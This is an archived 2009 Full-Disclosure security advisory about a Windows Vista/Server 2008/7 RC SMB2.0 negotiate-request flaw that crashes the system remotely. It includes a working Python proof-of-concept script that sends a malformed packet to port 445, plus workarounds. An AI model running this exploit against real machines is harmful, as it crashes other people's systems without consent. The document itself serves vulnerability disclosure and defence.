lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 11 Sep 2009 09:32:17 -0400
From: laurent gaffie <laurent.gaffie@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL
	REQUEST Remote B.S.O.D.

Advisory updated :


=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent GaffiƩ
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used to identify the SMB dialect that will be used for
futher communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-------------------------
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 <
R2, Windows 7 RC.

VII. SOLUTION
-------------------------
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent GaffiƩ
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them
advisory.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists